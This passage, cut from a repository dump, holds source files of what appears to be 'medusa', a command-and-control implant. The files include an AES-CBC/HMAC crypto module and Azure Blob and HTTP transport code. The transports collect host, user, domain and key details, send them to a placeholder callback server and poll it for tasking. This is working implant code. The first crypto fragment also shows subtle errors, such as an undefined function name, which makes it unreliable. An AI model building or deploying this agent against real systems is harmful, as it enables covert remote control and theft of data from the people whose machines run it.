[key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)]\n\n    def encrypt_block(self, plaintext):\n        assert len(plaintext) == 16\n        plain_state = bytes2amatrix(plaintext)\n        add_round_key(plain_state, self._key_matrices[0])\n        for i in range(1, self.n_rounds):\n            sub_bytes(plain_state)\n            shift_rows(plain_state)\n            mix_columns(plain_state)\n            add_round_key(plain_state, self._key_matrices[i])\n        sub_bytes(plain_state)\n        shift_rows(plain_state)\n        add_round_key(plain_state, self._key_matrices[-1])\n\n        return matrix2bytes(plain_state)\n\n    def decrypt_block(self, ciphertext):\n        assert len(ciphertext) == 16\n        cipher_state = bytes2matrix(ciphertext)\n        add_round_key(cipher_state, self._key_matrices[-1])\n        inv_shift_rows(cipher_state)\n        inv_sub_bytes(cipher_state)\n\n        for i in range(self.n_rounds - 1, 0, -1):\n            add_round_key(cipher_state, self._key_matrices[i])\n            inv_mix_columns(cipher_state)\n            inv_shift_rows(cipher_state)\n            inv_sub_bytes(cipher_state)\n        add_round_key(cipher_state, self._key_matrices[0])\n        return matrix2bytes(cipher_state)\n\n    def encrypt_cbc(self, plaintext, iv):\n        assert len(iv) == 16\n        plaintext = pad(plaintext)\n        blocks = []\n        previous = iv\n        for plaintext_block in split_blocks(plaintext):\n            block = self.encrypt_block(xor_bytes(plaintext_block, previous))\n            blocks.extend(block)\n            previous = block\n\n        return bytes(b''.join(blocks))\n\n    def decrypt_cbc(self, ciphertext, iv):\n        assert len(iv) == 16\n        blocks = []\n        previous = iv\n        for ciphertext_block in split_blocks(ciphertext):\n            blocks.extend(xor_bytes(previous, self.decrypt_block(ciphertext_block), True))\n            previous = ciphertext_block\n        return unpad(''.join(blocks))\n\nclass medusa:\n    def encrypt(self, data):\n        from hmac import new\n        import hashlib\n        if self.agent_config[\"enc_key\"][\"value\"] == \"aes256_hmac\" and len(data)>0:\n            key = base64.b64decode(self.agent_config[\"enc_key\"][\"enc_key\"])\n            iv = os.urandom(16)\n            ciphertext = AES(key).encrypt_cbc(data, iv)\n            hmac = new(key, iv + ciphertext, hashlib.sha256).digest()\n            return iv + ciphertext + hmac\n        else: return data\n\n    def decrypt(self, data):\n        from hmac import new, compare_digest\n        import hashlib\n        if self.agent_config[\"enc_key\"][\"value\"] == \"aes256_hmac\":\n            if len(data)>0:\n                key = base64.b64decode(self.agent_config[\"enc_key\"][\"dec_key\"])\n                uuid = data[:36]\n                iv = data[36:52]\n                ct = data[52:-32]\n                received_hmac = data[-32:]\n                hmac = new(key, iv + ct, hashlib.sha256).digest()\n                if compare_digest(hmac, received_hmac):\n                    return (uuid + AES(key).decrypt_cbc(ct, iv)).decode()\n                else: return \"\"\n            else: return \"\"\n        else: return data.decode()"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/manual_crypto.py3",
    "content": "s_box = (\n    0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,\n    0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,\n    0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,\n    0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,\n    0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,\n    0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,\n    0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,\n    0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,\n    0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,\n    0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,\n    0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,\n    0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,\n    0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,\n    0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,\n    0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,\n    0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,\n)\n\ninv_s_box = (\n    0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB,\n    0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB,\n    0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E,\n    0x08, 0x2E, 0xA1, 0x66, 0x28, 
0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25,\n    0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92,\n    0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84,\n    0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06,\n    0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B,\n    0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73,\n    0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E,\n    0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B,\n    0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4,\n    0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F,\n    0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF,\n    0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61,\n    0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D,\n)\n\ndef sub_bytes(s):\n    for i in range(4): \n        for j in range(4):\n            s[i][j] = s_box[s[i][j]]\n\ndef inv_sub_bytes(s):\n    for i in range(4):\n        for j in range(4):\n            s[i][j] = inv_s_box[s[i][j]]\n\ndef shift_rows(s):\n    s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1]\n    s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]\n    s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3]\n\ndef inv_shift_rows(s):\n    s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1]\n    s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]\n    s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], 
s[2][3], s[3][3], s[0][3]\n\ndef add_round_key(s, k):\n    for i in range(4):\n        for j in range(4):\n            s[i][j] ^= k[i][j]\n\nxtime = lambda a: (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1)\n\ndef mix_single_column(a):\n    t = a[0] ^ a[1] ^ a[2] ^ a[3]\n    u = a[0]\n    a[0] ^= t ^ xtime(a[0] ^ a[1])\n    a[1] ^= t ^ xtime(a[1] ^ a[2])\n    a[2] ^= t ^ xtime(a[2] ^ a[3])\n    a[3] ^= t ^ xtime(a[3] ^ u)\n\ndef mix_columns(s):\n    for i in range(4): mix_single_column(s[i])\n\ndef inv_mix_columns(s):\n    for i in range(4):\n        u = xtime(xtime(s[i][0] ^ s[i][2]))\n        v = xtime(xtime(s[i][1] ^ s[i][3]))\n        s[i][0] ^= u\n        s[i][1] ^= v\n        s[i][2] ^= u\n        s[i][3] ^= v\n\n    mix_columns(s)\n\nr_con = (\n    0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,\n    0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A,\n    0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A,\n    0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39,\n)\n\ndef bytes2matrix(text):\n    return [list(text[i:i+4]) for i in range(0, len(text), 4)]\n\ndef matrix2bytes(matrix):\n    return bytes(sum(matrix, []))\n\ndef xor_bytes(a, b):\n    return bytes(i^j for i, j in zip(a, b))\n\ndef inc_bytes(a):\n    out = list(a)\n    for i in reversed(range(len(out))):\n        if out[i] == 0xFF:\n            out[i] = 0\n        else:\n            out[i] += 1\n            break\n    return bytes(out)\n\ndef pad(plaintext):\n    padding_len = 16 - (len(plaintext) % 16)\n    padding = bytes([padding_len] * padding_len)\n    return plaintext + padding\n\ndef unpad(plaintext):\n    padding_len = plaintext[-1]\n    assert padding_len > 0\n    message, padding = plaintext[:-padding_len], plaintext[-padding_len:]\n    assert all(p == padding_len for p in padding)\n    return message\n\ndef split_blocks(message, block_size=16, require_padding=True):\n        assert len(message) % block_size == 0 or not require_padding\n        return [message[i:i+16] for i in range(0, 
len(message), block_size)]\n\nclass AES:\n    rounds_by_key_size = {16: 10, 24: 12, 32: 14}\n    def __init__(self, master_key):\n        assert len(master_key) in AES.rounds_by_key_size\n        self.n_rounds = AES.rounds_by_key_size[len(master_key)]\n        self._key_matrices = self._expand_key(master_key)\n\n    def _expand_key(self, master_key):\n        key_columns = bytes2matrix(master_key)\n        iteration_size = len(master_key) // 4\n        columns_per_iteration = len(key_columns)\n        i = 1\n        while len(key_columns) < (self.n_rounds + 1) * 4:\n            word = list(key_columns[-1])\n            if len(key_columns) % iteration_size == 0:\n                word.append(word.pop(0))\n                word = [s_box[b] for b in word]\n                word[0] ^= r_con[i]\n                i += 1\n            elif len(master_key) == 32 and len(key_columns) % iteration_size == 4:\n                word = [s_box[b] for b in word]\n\n            word = xor_bytes(word, key_columns[-iteration_size])\n            key_columns.append(word)\n        return [key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)]\n\n    def encrypt_block(self, plaintext):\n        assert len(plaintext) == 16\n        plain_state = bytes2matrix(plaintext)\n        add_round_key(plain_state, self._key_matrices[0])\n        for i in range(1, self.n_rounds):\n            sub_bytes(plain_state)\n            shift_rows(plain_state)\n            mix_columns(plain_state)\n            add_round_key(plain_state, self._key_matrices[i])\n        sub_bytes(plain_state)\n        shift_rows(plain_state)\n        add_round_key(plain_state, self._key_matrices[-1])\n\n        return matrix2bytes(plain_state)\n\n    def decrypt_block(self, ciphertext):\n        assert len(ciphertext) == 16\n        cipher_state = bytes2matrix(ciphertext)\n        add_round_key(cipher_state, self._key_matrices[-1])\n        inv_shift_rows(cipher_state)\n        inv_sub_bytes(cipher_state)\n\n        for i 
in range(self.n_rounds - 1, 0, -1):\n            add_round_key(cipher_state, self._key_matrices[i])\n            inv_mix_columns(cipher_state)\n            inv_shift_rows(cipher_state)\n            inv_sub_bytes(cipher_state)\n        add_round_key(cipher_state, self._key_matrices[0])\n        return matrix2bytes(cipher_state)\n\n    def encrypt_cbc(self, plaintext, iv):\n        assert len(iv) == 16\n        plaintext = pad(plaintext)\n        blocks = []\n        previous = iv\n        for plaintext_block in split_blocks(plaintext):\n            block = self.encrypt_block(xor_bytes(plaintext_block, previous))\n            blocks.append(block)\n            previous = block\n        return b''.join(blocks)\n\n    def decrypt_cbc(self, ciphertext, iv):\n        assert len(iv) == 16\n        blocks = []\n        previous = iv\n        for ciphertext_block in split_blocks(ciphertext):\n            blocks.append(xor_bytes(previous, self.decrypt_block(ciphertext_block)))\n            previous = ciphertext_block\n        return unpad(b''.join(blocks))\n\n\nclass medusa:\n    def encrypt(self, data):\n        from hmac import new\n        if self.agent_config[\"enc_key\"][\"value\"] == \"aes256_hmac\" and len(data)>0:\n            key = base64.b64decode(self.agent_config[\"enc_key\"][\"enc_key\"])\n            iv = os.urandom(16)\n            ciphertext = AES(key).encrypt_cbc(data, iv)\n            hmac = new(key, iv + ciphertext, 'sha256').digest()\n            return iv + ciphertext + hmac\n        else:\n            return data\n\n    def decrypt(self, data):\n        from hmac import new, compare_digest\n\n        if self.agent_config[\"enc_key\"][\"value\"] == \"aes256_hmac\":\n            if len(data)>0:\n                key = base64.b64decode(self.agent_config[\"enc_key\"][\"dec_key\"])\n                uuid = data[:36]\n                iv = data[36:52]\n                ct = data[52:-32]\n                received_hmac = data[-32:]\n                hmac = new(key, 
iv + ct, 'sha256').digest()\n                if compare_digest(hmac, received_hmac):\n                    return (uuid + AES(key).decrypt_cbc(ct, iv)).decode()\n                else: return \"\"\n            else: return \"\"\n        else: return data.decode()\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/transport_azure_blob.py2",
    "content": "### IMPORTS ###\nimport urllib2\nimport uuid\n\n### CLASS_FIELDS ###\n    blob_endpoint = \"BLOB_ENDPOINT_PLACEHOLDER\"\n    container_name = \"CONTAINER_NAME_PLACEHOLDER\"\n    sas_token = \"CONTAINER_SAS_PLACEHOLDER\"\n    gcontext = None\n#CERTSKIP\n\n### FUNCTIONS ###\n    def get_blob_url(self, blob_path):\n        return \"{}/{}/{}?{}\".format(self.blob_endpoint, self.container_name, blob_path, self.sas_token)\n\n    def put_blob(self, blob_path, data):\n        url = self.get_blob_url(blob_path)\n        try:\n            req = urllib2.Request(url, data=data)\n            req.get_method = lambda: \"PUT\"\n            req.add_header(\"x-ms-blob-type\", \"BlockBlob\")\n            req.add_header(\"Content-Type\", \"application/octet-stream\")\n            req.add_header(\"Content-Length\", str(len(data)))\n            try:\n                resp = urllib2.urlopen(req, context=self.gcontext, timeout=30)\n            except TypeError:\n                resp = urllib2.urlopen(req, timeout=30)\n            try:\n                return resp.getcode() in (200, 201)\n            finally:\n                try:\n                    resp.close()\n                except Exception:\n                    pass\n        except Exception:\n            return False\n\n    def delete_blob(self, blob_path):\n        url = self.get_blob_url(blob_path)\n        try:\n            req = urllib2.Request(url)\n            req.get_method = lambda: \"DELETE\"\n            req.add_header(\"x-ms-blob-type\", \"BlockBlob\")\n            req.add_header(\"Content-Type\", \"application/octet-stream\")\n\n            try:\n                resp = urllib2.urlopen(req, context=self.gcontext, timeout=30)\n            except TypeError:\n                resp = urllib2.urlopen(req, timeout=30)\n            try:\n                return resp.getcode() in (200, 201, 202, 204)\n            finally:\n                try:\n                    resp.close()\n                except Exception:\n   
                 pass\n        except Exception:\n            return False\n\n    def get_blob(self, blob_path):\n        url = self.get_blob_url(blob_path)\n        try:\n            req = urllib2.Request(url)\n            try:\n                resp = urllib2.urlopen(req, context=self.gcontext, timeout=30)\n            except TypeError:\n                resp = urllib2.urlopen(req, timeout=30)\n            try:\n                return resp.read()\n            finally:\n                resp.close()\n        except urllib2.HTTPError as e:\n            if e.code == 404:\n                return b\"\"\n            return b\"\"\n        except Exception:\n            return b\"\"\n\n    def postMessageAndRetrieveResponseBlob(self, data):\n        formatted_data = self.formatMessage(data)\n        message_id = uuid.uuid4()\n        self.put_blob(\"ats/{}.blob\".format(message_id), formatted_data)\n        response = b\"\"\n        while response == b\"\":\n            self.agentSleep()\n            response = self.get_blob(\"sta/{}.blob\".format(message_id))\n        self.delete_blob(\"sta/{}.blob\".format(message_id))\n        decoded_response = base64.b64decode(response)\n        return self.formatResponse(self.decrypt(decoded_response))\n\n    def postMessageAndRetrieveResponse(self, data):\n        return self.postMessageAndRetrieveResponseBlob(data)\n\n    def getMessageAndRetrieveResponse(self, data):\n        return self.postMessageAndRetrieveResponseBlob(data)\n\n    def checkIn(self):\n        hostname = socket.gethostname()\n        ip = ''\n        if hostname and len(hostname) > 0:\n            try:\n                ip = socket.gethostbyname(hostname)\n            except:\n                pass\n\n        data = {\n            \"action\": \"checkin\",\n            \"ip\": ip,\n            \"os\": self.getOSVersion(),\n            \"user\": self.getUsername(),\n            \"host\": hostname,\n            \"domain\": socket.getfqdn(),\n            \"pid\": 
os.getpid(),\n            \"uuid\": self.agent_config[\"PayloadUUID\"],\n            \"architecture\": \"x64\" if sys.maxsize > 2**32 else \"x86\",\n            \"encryption_key\": self.agent_config[\"enc_key\"][\"enc_key\"],\n            \"decryption_key\": self.agent_config[\"enc_key\"][\"dec_key\"]\n        }\n        response_data = self.postMessageAndRetrieveResponse(data)\n        if(\"status\" in response_data):\n            UUID = response_data[\"id\"]\n            self.agent_config[\"UUID\"] = UUID\n            return True\n        else: return False\n\n    def makeRequest(self, data, method='GET'):\n        hdrs = {}\n        for header in self.agent_config[\"Headers\"]:\n            hdrs[header] = self.agent_config[\"Headers\"][header]\n        if method == 'GET':\n            req = urllib2.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"GetURI\"] + \"?\" + self.agent_config[\"GetParam\"] + \"=\" + data.decode(), None, hdrs)\n        else:\n            req = urllib2.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"PostURI\"], data, hdrs)\n\n        if self.agent_config[\"ProxyHost\"] and self.agent_config[\"ProxyPort\"]:\n            tls = \"https\" if self.agent_config[\"ProxyHost\"][0:5] == \"https\" else \"http\"\n            handler = urllib2.HTTPSHandler if tls == \"https\" else urllib2.HTTPHandler\n            if self.agent_config[\"ProxyUser\"] and self.agent_config[\"ProxyPass\"]:\n                proxy = urllib2.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config[\"ProxyUser\"], self.agent_config[\"ProxyPass\"], \\\n                                                                self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                auth = urllib2.HTTPBasicAuthHandler()\n                opener = urllib2.build_opener(proxy, auth, 
handler)\n            else:\n                proxy = urllib2.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}'.format(tls, self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                opener = urllib2.build_opener(proxy, handler)\n            urllib2.install_opener(opener)\n        try:\n            try:\n                response = urllib2.urlopen(req, context=self.gcontext, timeout=30)\n            except TypeError:\n                response = urllib2.urlopen(req, timeout=30)\n            out = base64.b64decode(response.read())\n            response.close()\n            return out\n        except: return \"\"\n\n### CONFIG ###\n            \"Headers\": HEADER_PLACEHOLDER,\n            \"Sleep\": int(\"CALLBACK_INTERVAL_PLACEHOLDER\"),\n            \"Jitter\": int(\"CALLBACK_JITTER_PLACEHOLDER\"),\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/transport_azure_blob.py3",
    "content": "### IMPORTS ###\nimport urllib.request\nimport uuid\n\n### CLASS_FIELDS ###\n    blob_endpoint = \"BLOB_ENDPOINT_PLACEHOLDER\"\n    container_name = \"CONTAINER_NAME_PLACEHOLDER\"\n    sas_token = \"CONTAINER_SAS_PLACEHOLDER\"\n    gcontext = None\n#CERTSKIP\n\n### FUNCTIONS ###\n    def get_blob_url(self, blob_path: str) -> str:\n        return f\"{self.blob_endpoint}/{self.container_name}/{blob_path}?{self.sas_token}\"\n\n    def put_blob(self, blob_path: str, data: bytes) -> bool:\n        url = self.get_blob_url(blob_path)\n        try:\n            req = urllib.request.Request(\n                url,\n                data=data,\n                method=\"PUT\",\n                headers={\n                    \"x-ms-blob-type\": \"BlockBlob\",\n                    \"Content-Type\": \"application/octet-stream\",\n                    \"Content-Length\": str(len(data)),\n                }\n            )\n            with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as resp:\n                return resp.status in (200, 201)\n        except Exception:\n            return False\n\n    def delete_blob(self, blob_path: str) -> bool:\n        url = self.get_blob_url(blob_path)\n        try:\n            req = urllib.request.Request(\n                url,\n                method=\"DELETE\",\n                headers={\n                    \"x-ms-blob-type\": \"BlockBlob\",\n                    \"Content-Type\": \"application/octet-stream\",\n                }\n            )\n            with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as resp:\n                return resp.status in (200, 201, 202, 204)\n        except Exception:\n            return False\n\n    def get_blob(self, blob_path: str) -> bytes:\n        url = self.get_blob_url(blob_path)\n        try:\n            req = urllib.request.Request(url, method=\"GET\")\n            with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as resp:\n         
       return resp.read()\n        except urllib.request.HTTPError as e:\n            if e.code == 404:\n                return b\"\"\n            return b\"\"\n        except Exception:\n            return b\"\"\n\n    def postMessageAndRetrieveResponseBlob(self, data):\n        formatted_data = self.formatMessage(data)\n        message_id = uuid.uuid4()\n        self.put_blob(f\"ats/{message_id}.blob\", formatted_data)\n        response = b\"\"\n        while response == b\"\":\n            self.agentSleep()\n            response = self.get_blob(f\"sta/{message_id}.blob\")\n        self.delete_blob(f\"sta/{message_id}.blob\")\n        decoded_response = base64.b64decode(response)\n        return self.formatResponse(self.decrypt(decoded_response))\n\n    def postMessageAndRetrieveResponse(self, data):\n        return self.postMessageAndRetrieveResponseBlob(data)\n\n    def getMessageAndRetrieveResponse(self, data):\n        return self.postMessageAndRetrieveResponseBlob(data)\n\n    def checkIn(self):\n        hostname = socket.gethostname()\n        ip = ''\n        if hostname and len(hostname) > 0:\n            try:\n                ip = socket.gethostbyname(hostname)\n            except:\n                pass\n\n        data = {\n            \"action\": \"checkin\",\n            \"ip\": ip,\n            \"os\": self.getOSVersion(),\n            \"user\": self.getUsername(),\n            \"host\": hostname,\n            \"domain\": socket.getfqdn(),\n            \"pid\": os.getpid(),\n            \"uuid\": self.agent_config[\"PayloadUUID\"],\n            \"architecture\": \"x64\" if sys.maxsize > 2**32 else \"x86\",\n            \"encryption_key\": self.agent_config[\"enc_key\"][\"enc_key\"],\n            \"decryption_key\": self.agent_config[\"enc_key\"][\"dec_key\"]\n        }\n        response_data = self.postMessageAndRetrieveResponse(data)\n        if(\"status\" in response_data):\n            UUID = response_data[\"id\"]\n            
self.agent_config[\"UUID\"] = UUID\n            return True\n        else: return False\n\n    def makeRequest(self, data, method='GET'):\n        hdrs = {}\n        for header in self.agent_config[\"Headers\"]:\n            hdrs[header] = self.agent_config[\"Headers\"][header]\n        if method == 'GET':\n            req = urllib.request.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"GetURI\"] + \"?\" + self.agent_config[\"GetParam\"] + \"=\" + data.decode(), None, hdrs)\n        else:\n            req = urllib.request.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"PostURI\"], data, hdrs)\n\n        if self.agent_config[\"ProxyHost\"] and self.agent_config[\"ProxyPort\"]:\n            tls = \"https\" if self.agent_config[\"ProxyHost\"][0:5] == \"https\" else \"http\"\n            handler = urllib.request.HTTPSHandler if tls == \"https\" else urllib.request.HTTPHandler\n            if self.agent_config[\"ProxyUser\"] and self.agent_config[\"ProxyPass\"]:\n                proxy = urllib.request.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config[\"ProxyUser\"], self.agent_config[\"ProxyPass\"], \\\n                                                                self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                auth = urllib.request.HTTPBasicAuthHandler()\n                opener = urllib.request.build_opener(proxy, auth, handler)\n            else:\n                proxy = urllib.request.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}'.format(tls, self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                opener = urllib.request.build_opener(proxy, handler)\n            urllib.request.install_opener(opener)\n        try:\n            with 
urllib.request.urlopen(req, context=self.gcontext, timeout=30) as response:\n                out = base64.b64decode(response.read())\n                response.close()\n                return out\n        except: return \"\"\n\n### CONFIG ###\n            \"Headers\": HEADER_PLACEHOLDER,\n            \"Sleep\": int(\"CALLBACK_INTERVAL_PLACEHOLDER\"),\n            \"Jitter\": int(\"CALLBACK_JITTER_PLACEHOLDER\"),\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/transport_http.py2",
    "content": "### IMPORTS ###\nimport urllib2\n\n### CLASS_FIELDS ###\n\n### FUNCTIONS ###\n    def postMessageAndRetrieveResponse(self, data):\n        return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data), 'POST')))\n\n    def getMessageAndRetrieveResponse(self, data):\n        return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data, True))))\n\n    def checkIn(self):\n        hostname = socket.gethostname()\n        ip = ''\n        if hostname and len(hostname) > 0:\n            try:\n                ip = socket.gethostbyname(hostname)\n            except:\n                pass\n\n        data = {\n            \"action\": \"checkin\",\n            \"ip\": ip,\n            \"os\": self.getOSVersion(),\n            \"user\": self.getUsername(),\n            \"host\": hostname,\n            \"domain\": socket.getfqdn(),\n            \"pid\": os.getpid(),\n            \"uuid\": self.agent_config[\"PayloadUUID\"],\n            \"architecture\": \"x64\" if sys.maxsize > 2**32 else \"x86\",\n            \"encryption_key\": self.agent_config[\"enc_key\"][\"enc_key\"],\n            \"decryption_key\": self.agent_config[\"enc_key\"][\"dec_key\"]\n        }\n        response_data = self.postMessageAndRetrieveResponse(data)\n        if(\"status\" in response_data):\n            UUID = response_data[\"id\"]\n            self.agent_config[\"UUID\"] = UUID\n            return True\n        else: return False\n\n    def makeRequest(self, data, method='GET'):\n        hdrs = {}\n        for header in self.agent_config[\"Headers\"]:\n            hdrs[header] = self.agent_config[\"Headers\"][header]\n        if method == 'GET':\n            req = urllib2.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"GetURI\"] + \"?\" + self.agent_config[\"GetParam\"] + \"=\" + data.decode(), None, hdrs)\n        else:\n            req = urllib2.Request(self.agent_config[\"Server\"] + \":\" + 
self.agent_config[\"Port\"] + self.agent_config[\"PostURI\"], data, hdrs)\n        #CERTSKIP\n        if self.agent_config[\"ProxyHost\"] and self.agent_config[\"ProxyPort\"]:\n            tls = \"https\" if self.agent_config[\"ProxyHost\"][0:5] == \"https\" else \"http\"\n            handler = urllib2.HTTPSHandler if tls == \"https\" else urllib2.HTTPHandler\n            if self.agent_config[\"ProxyUser\"] and self.agent_config[\"ProxyPass\"]:\n                proxy = urllib2.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config[\"ProxyUser\"], self.agent_config[\"ProxyPass\"], \\\n                        self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                auth = urllib2.HTTPBasicAuthHandler()\n                opener = urllib2.build_opener(proxy, auth, handler)\n            else:\n                proxy = urllib2.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}'.format(tls, self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                opener = urllib2.build_opener(proxy, handler)\n            urllib2.install_opener(opener)\n        try:\n            response = urllib2.urlopen(req)\n            out = base64.b64decode(response.read())\n            response.close()\n            return out\n        except: return \"\"\n\n### CONFIG ###\n            \"Server\": \"callback_host\",\n            \"Port\": 